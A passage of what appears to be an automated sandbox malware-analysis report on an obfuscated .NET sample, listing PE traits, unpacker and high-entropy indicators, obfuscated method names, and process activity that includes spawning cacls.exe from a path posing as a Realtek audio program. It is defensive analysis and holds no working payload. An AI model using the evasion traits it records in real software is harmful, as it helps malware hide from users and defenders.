                Source: Pp7OXMFwqhXKx5Y.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179230808356.0000000001008000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179230808356.0000000001008000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179230035520.00000000033BE000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179233863285.0000000003566000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Pp7OXMFwqhXKx5Y.exe, Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179230035520.00000000033BE000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179233863285.0000000003566000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, PYwgDUyCfG3xhOjec2.cs.Net Code: L0mZ2pPbFO System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, PYwgDUyCfG3xhOjec2.cs.Net Code: L0mZ2pPbFO System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.5d50000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 0_2_0193EF23 push esp; iretd 0_2_0193EF29
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 0_2_0193EF20 pushad ; iretd 0_2_0193EF21
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_00414970 push ds; retf 2_2_00414996
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_00419109 push cs; ret 2_2_0041910B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0040C1FF pushad ; iretd 2_2_0040C202
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0041F19B pushfd ; ret 2_2_0041F1B3
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_004149BC push ds; iretd 2_2_004149CE
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_00402215 push es; retf 2_2_00402217
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0040AB40 push es; ret 2_2_0040AB41
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0041844F push esp; retf 2_2_00418456
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_00403460 push eax; ret 2_2_00403462
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0041A5EB pushfd ; iretd 2_2_0041A62B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0041A5F3 pushfd ; iretd 2_2_0041A62B
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_00417E58 push ecx; retf 2_2_00417E59
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_00418F48 push cs; iretd 2_2_00418F4D
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0041577D push eax; iretd 2_2_004157A8
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0040671F pushad ; iretd 2_2_00406720
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014A08CD push ecx; mov dword ptr [esp], ecx2_2_014A08D6
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03515FC5 push ebx; iretd 3_2_03515FC6
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03516E33 push edi; ret 3_2_03516E34
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_035122E6 push ss; ret 3_2_035122EA
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0350C036 push ecx; retf 3_2_0350C038
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03DC87C3 push edi; ret 3_2_03DC87C4
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03DBD9C6 push ecx; retf 3_2_03DBD9C8
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03DC7955 push ebx; iretd 3_2_03DC7956
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03DC3C76 push ss; ret 3_2_03DC3C7A
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037121AD pushad ; retf 0004h4_2_0371223F
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037408CD push ecx; mov dword ptr [esp], ecx4_2_037408D6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037197A1 push es; iretd 4_2_037197A8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035CB2E6 push ss; ret 4_2_035CB2EA
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_035C5036 push ecx; retf 4_2_035C5038
                Source: Pp7OXMFwqhXKx5Y.exeStatic PE information: section name: .text entropy: 7.815154891038661
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, CaGHojxoRBOvJGpPTZ.csHigh entropy of concatenated method names: 'tYjg5xZfrq', 'KSpg9Ntl9n', 'UICgOQVRFo', 'v4bgxTNLJ6', 'n20gTLkxtx', 'd0sgiQmg71', 'xxHgdg6WlF', 'c1egEddTkg', 'v4dg04tXgB', 'i6ygus1OaI'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, PYwgDUyCfG3xhOjec2.csHigh entropy of concatenated method names: 'AX8DY92AAd', 'EIrDsBKpyI', 'f2aDl53gAg', 'KOVDg8TgPO', 'hHKDwDC8qD', 'bh4DvvK56D', 'R54DKbNvDF', 'RHcDyIFDVW', 'IH0DQTcqKs', 'XrUDtPVZlg'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, eClGVZ7L4wNYqRUcnf.csHigh entropy of concatenated method names: 'knfKnDwGlf', 'AMVKGOvX6q', 'F2DK2IMvu1', 'PLEK5NCCI2', 'zJ3K6ERIiU', 'r3GK9Ro3L7', 'VcoKC5nwLk', 'WVbKOEKdqF', 'wSmKxOqDV9', 'zB8K3Qs22y'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, Uh1IXUppBwx1OBD0l94.csHigh entropy of concatenated method names: 'g6TuJi0KWH', 'eujuzLdHyk', 'kp8XmcuL6h', 'bGUXprSnic', 'iRoX4yIVrb', 'RBWXDOja8V', 'scxXZUq9Z8', 'p3cXYcNZOE', 'eajXsydMwF', 'B0TXlXkFQm'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, I7RVpHz4FqwflZN0id.csHigh entropy of concatenated method names: 'qsju9f7IGP', 'ImMuOgMqk5', 'viyuxqned5', 'oWHuASD25r', 'pPAuLBRPjd', 'rQSuNZwvdI', 'cccurf5uyT', 'fiLuRJyGKa', 'wXnunXASvC', 'cJ9uGLIqkr'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, MMSIjoLGZ6B7Yqaa3l.csHigh entropy of concatenated method names: 'eqK01v1lltW7I1KJsbB', 'SL15IB17TTKdUWapAhf', 'A2tvE6l4SW', 'GM2v0iCeZD', 'GYjvucR3xn', 'EisOrg1JePn9dehqTF7', 'n0fbcI1Lk339Qb3VwpL'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, CK39ihhagYlouC5fDc.csHigh entropy of concatenated method names: 'R9h0AEVq9b', 'yCC0L076pU', 'E9O0j3NHq3', 'OnN0N8N4S1', 'ATi0rltiiu', 'YAS0a68TUU', 'SUw0BKqfqp', 'kbZ01PyK1O', 'UER0733u82', 'NRq0f23lCN'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, WMNDnseZvMvATctFLM.csHigh entropy of concatenated method names: 'KLfTfQMnBL', 'BBiTPPPSlU', 'dTATeSmmjq', 'NtoTqXmppI', 't9nTLOIM2Z', 'QXTTjpMcfV', 'Tn4TNpq2eR', 'wKLTr3fnG4', 'FE2TauCeD0', 'p8MTBDcYG7'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, vU4WQCHpZAo8PF99B8.csHigh entropy of concatenated method names: 'XTLdVajjqu', 'iRIdJhNcAl', 't3PEmiFn72', 'A58EphxV9x', 'Ln5dohj8jX', 'FbjdPCAa8r', 'LiudUrnpAj', 'P6adev3Uha', 'LnbdqMNfBC', 'GQxdMF3cGa'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, YqHJWJ3lonHrloUDs2.csHigh entropy of concatenated method names: 'Oy5w6F7jp8', 'bCOwCmBy87', 'sbigjf6NRd', 'jWFgNC0306', 'eCBgrLBxy8', 'a2sgaRQT3o', 'P1BgBvJjMB', 'zYdg19OhOx', 'ssng79eeD1', 'Whfgf9MvNe'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, GqLsw9gDNXXdmvcnIN.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'LGo4hCBtRN', 'weL4JNZWAq', 'GO54zmkkGe', 'EBWDmJ53Dc', 'QC8Dp7Gc1l', 'vUiD48GXL4', 'V9qDDXYiBf', 'pXQUT1P0dJp8ReLLhvq'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, whOcAAAh4ILtw3qpVG.csHigh entropy of concatenated method names: 'rhjvYE0qD2', 'gY1vlcksiw', 'wbXvwoaiEP', 'GGgvK5Oiis', 'jJxvybinL0', 'QNUwccX5cO', 'zI5wHcBpbs', 'wlhwSZgUxB', 'I2hwV1vVov', 'YKLwhJ0boq'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, QGTy144A47QOmD2Xe0.csHigh entropy of concatenated method names: 'NCk2ZjyD7', 'pr15R7xMm', 'MlN9dC7J7', 'b9wCDPFMm', 'nHDxYweMd', 'vIL3GQ6cy', 'BqAJ7Th95xerFyVi38', 'Bs5HJpsGtaZ0hdfgLP', 'lO3EWbRpr', 'zIduSKCWV'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, p1UHuFOvEAowV6fk4b.csHigh entropy of concatenated method names: 'Q8elekcO0G', 'kCAlqheTfk', 'odUlM5AVnF', 'n9HlkE8Oql', 'ptOlccIdXI', 'WgclHZQG6x', 'lDVlSYbrPU', 'sonlVoeCCx', 'wNClh8Jm6Q', 'bNSlJlN7ov'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, z8K2SvSpx5gaJUg5bJ.csHigh entropy of concatenated method names: 'qJN0T5oBtr', 'N5E0ds8So8', 'pqN00wTDLD', 'xOB0XDjKlc', 'yhh08ARPch', 'z7U0ReqUJW', 'Dispose', 'PNREsjMC2f', 'ctyEl4YfnC', 'KogEggIUH3'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, wTAUENZUfUP4v48bva.csHigh entropy of concatenated method names: 'tPipK1UHuF', 'jEApyowV6f', 'HoRptBOvJG', 'bPTpIZJqHJ', 'OUDpTs2WhO', 'UAApih4ILt', 'rLBgFdA7ii0MwEuuWK', 'KZFeM7OOGbOxlSTUOg', 'vyBppHxu0x', 'U30pDVigih'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, tUhnM5J6K852o5er6r.csHigh entropy of concatenated method names: 'puVugE6AQD', 'MlKuwYIh6R', 'Pnpuv3cA0f', 'LBCuKQZybM', 'jLiu0q50fK', 'FUeuyNt9p9', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, vFb8xHkrHYDNoISV3t.csHigh entropy of concatenated method names: 'bIldtOPH1M', 'JiIdIyjneq', 'ToString', 'OhxdsmS1Dd', 'e4ndlTmQQF', 'ppWdgiBmIM', 'ML4dw16nkF', 'igvdvlG0jO', 'BeadKbHoDR', 'ldWdyeS1FC'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, JFCDpQUrjrpJFKU5TZ.csHigh entropy of concatenated method names: 'dNGbONLfkN', 'hchbxNKtaQ', 'rhwbA11Uen', 'BwobLqOC7o', 'Cy8bNcLFQ4', 'm6hbrmM875', 'shlbBGvCYD', 'zWvb140qse', 'BFwbfatYw2', 'h9YboMmHc2'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, ERrfaTpmxoiGX67imZQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bhquoQub9Z', 'Uh9uPM3l88', 'BEtuU4BVo9', 'UCKue1sONM', 'cMsuqhCCSt', 'LgFuMEbAWl', 'PBNukoNl8c'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, lCc2KjBBNmjGuWgBhd.csHigh entropy of concatenated method names: 'NsUKsagGnB', 'nQXKgfEJT5', 'ewvKvxkdIJ', 'p03vJ68mIu', 'ThWvz5Ro13', 'F9nKmeH7yy', 'gWvKpCcCnk', 'n6OK4VfPhL', 'aB8KDny5uZ', 'l12KZIBWhQ'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, SwgKjolByEPP4ImUbS.csHigh entropy of concatenated method names: 'Dispose', 'AgaphJUg5b', 'a1O4LWYG9h', 'Y068wk23dW', 'YoapJeLCDJ', 'qrEpzN7veh', 'ProcessDialogKey', 'VY94mK39ih', 'KgY4plouC5', 'ODc44XUhnM'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, XsiiDNMrZi3cTVBIIK.csHigh entropy of concatenated method names: 'ToString', 'MmIio29Cmk', 'DvAiLSLnjd', 'F9wijHZhP2', 'x1niN1DJrG', 'g4mirpRdv4', 'UkGiaLR1uG', 'NHwiBrB389', 'QJZi1bx9iI', 'uNCi7DT47k'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, CaGHojxoRBOvJGpPTZ.csHigh entropy of concatenated method names: 'tYjg5xZfrq', 'KSpg9Ntl9n', 'UICgOQVRFo', 'v4bgxTNLJ6', 'n20gTLkxtx', 'd0sgiQmg71', 'xxHgdg6WlF', 'c1egEddTkg', 'v4dg04tXgB', 'i6ygus1OaI'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, PYwgDUyCfG3xhOjec2.csHigh entropy of concatenated method names: 'AX8DY92AAd', 'EIrDsBKpyI', 'f2aDl53gAg', 'KOVDg8TgPO', 'hHKDwDC8qD', 'bh4DvvK56D', 'R54DKbNvDF', 'RHcDyIFDVW', 'IH0DQTcqKs', 'XrUDtPVZlg'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, eClGVZ7L4wNYqRUcnf.csHigh entropy of concatenated method names: 'knfKnDwGlf', 'AMVKGOvX6q', 'F2DK2IMvu1', 'PLEK5NCCI2', 'zJ3K6ERIiU', 'r3GK9Ro3L7', 'VcoKC5nwLk', 'WVbKOEKdqF', 'wSmKxOqDV9', 'zB8K3Qs22y'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, Uh1IXUppBwx1OBD0l94.csHigh entropy of concatenated method names: 'g6TuJi0KWH', 'eujuzLdHyk', 'kp8XmcuL6h', 'bGUXprSnic', 'iRoX4yIVrb', 'RBWXDOja8V', 'scxXZUq9Z8', 'p3cXYcNZOE', 'eajXsydMwF', 'B0TXlXkFQm'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, I7RVpHz4FqwflZN0id.csHigh entropy of concatenated method names: 'qsju9f7IGP', 'ImMuOgMqk5', 'viyuxqned5', 'oWHuASD25r', 'pPAuLBRPjd', 'rQSuNZwvdI', 'cccurf5uyT', 'fiLuRJyGKa', 'wXnunXASvC', 'cJ9uGLIqkr'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, MMSIjoLGZ6B7Yqaa3l.csHigh entropy of concatenated method names: 'eqK01v1lltW7I1KJsbB', 'SL15IB17TTKdUWapAhf', 'A2tvE6l4SW', 'GM2v0iCeZD', 'GYjvucR3xn', 'EisOrg1JePn9dehqTF7', 'n0fbcI1Lk339Qb3VwpL'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, CK39ihhagYlouC5fDc.csHigh entropy of concatenated method names: 'R9h0AEVq9b', 'yCC0L076pU', 'E9O0j3NHq3', 'OnN0N8N4S1', 'ATi0rltiiu', 'YAS0a68TUU', 'SUw0BKqfqp', 'kbZ01PyK1O', 'UER0733u82', 'NRq0f23lCN'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, WMNDnseZvMvATctFLM.csHigh entropy of concatenated method names: 'KLfTfQMnBL', 'BBiTPPPSlU', 'dTATeSmmjq', 'NtoTqXmppI', 't9nTLOIM2Z', 'QXTTjpMcfV', 'Tn4TNpq2eR', 'wKLTr3fnG4', 'FE2TauCeD0', 'p8MTBDcYG7'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, vU4WQCHpZAo8PF99B8.csHigh entropy of concatenated method names: 'XTLdVajjqu', 'iRIdJhNcAl', 't3PEmiFn72', 'A58EphxV9x', 'Ln5dohj8jX', 'FbjdPCAa8r', 'LiudUrnpAj', 'P6adev3Uha', 'LnbdqMNfBC', 'GQxdMF3cGa'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, YqHJWJ3lonHrloUDs2.csHigh entropy of concatenated method names: 'Oy5w6F7jp8', 'bCOwCmBy87', 'sbigjf6NRd', 'jWFgNC0306', 'eCBgrLBxy8', 'a2sgaRQT3o', 'P1BgBvJjMB', 'zYdg19OhOx', 'ssng79eeD1', 'Whfgf9MvNe'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, GqLsw9gDNXXdmvcnIN.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'LGo4hCBtRN', 'weL4JNZWAq', 'GO54zmkkGe', 'EBWDmJ53Dc', 'QC8Dp7Gc1l', 'vUiD48GXL4', 'V9qDDXYiBf', 'pXQUT1P0dJp8ReLLhvq'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, whOcAAAh4ILtw3qpVG.csHigh entropy of concatenated method names: 'rhjvYE0qD2', 'gY1vlcksiw', 'wbXvwoaiEP', 'GGgvK5Oiis', 'jJxvybinL0', 'QNUwccX5cO', 'zI5wHcBpbs', 'wlhwSZgUxB', 'I2hwV1vVov', 'YKLwhJ0boq'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, QGTy144A47QOmD2Xe0.csHigh entropy of concatenated method names: 'NCk2ZjyD7', 'pr15R7xMm', 'MlN9dC7J7', 'b9wCDPFMm', 'nHDxYweMd', 'vIL3GQ6cy', 'BqAJ7Th95xerFyVi38', 'Bs5HJpsGtaZ0hdfgLP', 'lO3EWbRpr', 'zIduSKCWV'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, p1UHuFOvEAowV6fk4b.csHigh entropy of concatenated method names: 'Q8elekcO0G', 'kCAlqheTfk', 'odUlM5AVnF', 'n9HlkE8Oql', 'ptOlccIdXI', 'WgclHZQG6x', 'lDVlSYbrPU', 'sonlVoeCCx', 'wNClh8Jm6Q', 'bNSlJlN7ov'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, z8K2SvSpx5gaJUg5bJ.csHigh entropy of concatenated method names: 'qJN0T5oBtr', 'N5E0ds8So8', 'pqN00wTDLD', 'xOB0XDjKlc', 'yhh08ARPch', 'z7U0ReqUJW', 'Dispose', 'PNREsjMC2f', 'ctyEl4YfnC', 'KogEggIUH3'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, wTAUENZUfUP4v48bva.csHigh entropy of concatenated method names: 'tPipK1UHuF', 'jEApyowV6f', 'HoRptBOvJG', 'bPTpIZJqHJ', 'OUDpTs2WhO', 'UAApih4ILt', 'rLBgFdA7ii0MwEuuWK', 'KZFeM7OOGbOxlSTUOg', 'vyBppHxu0x', 'U30pDVigih'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, tUhnM5J6K852o5er6r.csHigh entropy of concatenated method names: 'puVugE6AQD', 'MlKuwYIh6R', 'Pnpuv3cA0f', 'LBCuKQZybM', 'jLiu0q50fK', 'FUeuyNt9p9', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, vFb8xHkrHYDNoISV3t.csHigh entropy of concatenated method names: 'bIldtOPH1M', 'JiIdIyjneq', 'ToString', 'OhxdsmS1Dd', 'e4ndlTmQQF', 'ppWdgiBmIM', 'ML4dw16nkF', 'igvdvlG0jO', 'BeadKbHoDR', 'ldWdyeS1FC'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, JFCDpQUrjrpJFKU5TZ.csHigh entropy of concatenated method names: 'dNGbONLfkN', 'hchbxNKtaQ', 'rhwbA11Uen', 'BwobLqOC7o', 'Cy8bNcLFQ4', 'm6hbrmM875', 'shlbBGvCYD', 'zWvb140qse', 'BFwbfatYw2', 'h9YboMmHc2'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, ERrfaTpmxoiGX67imZQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bhquoQub9Z', 'Uh9uPM3l88', 'BEtuU4BVo9', 'UCKue1sONM', 'cMsuqhCCSt', 'LgFuMEbAWl', 'PBNukoNl8c'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, lCc2KjBBNmjGuWgBhd.csHigh entropy of concatenated method names: 'NsUKsagGnB', 'nQXKgfEJT5', 'ewvKvxkdIJ', 'p03vJ68mIu', 'ThWvz5Ro13', 'F9nKmeH7yy', 'gWvKpCcCnk', 'n6OK4VfPhL', 'aB8KDny5uZ', 'l12KZIBWhQ'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, SwgKjolByEPP4ImUbS.csHigh entropy of concatenated method names: 'Dispose', 'AgaphJUg5b', 'a1O4LWYG9h', 'Y068wk23dW', 'YoapJeLCDJ', 'qrEpzN7veh', 'ProcessDialogKey', 'VY94mK39ih', 'KgY4plouC5', 'ODc44XUhnM'
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, XsiiDNMrZi3cTVBIIK.csHigh entropy of concatenated method names: 'ToString', 'MmIio29Cmk', 'DvAiLSLnjd', 'F9wijHZhP2', 'x1niN1DJrG', 'g4mirpRdv4', 'UkGiaLR1uG', 'NHwiBrB389', 'QJZi1bx9iI', 'uNCi7DT47k'
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
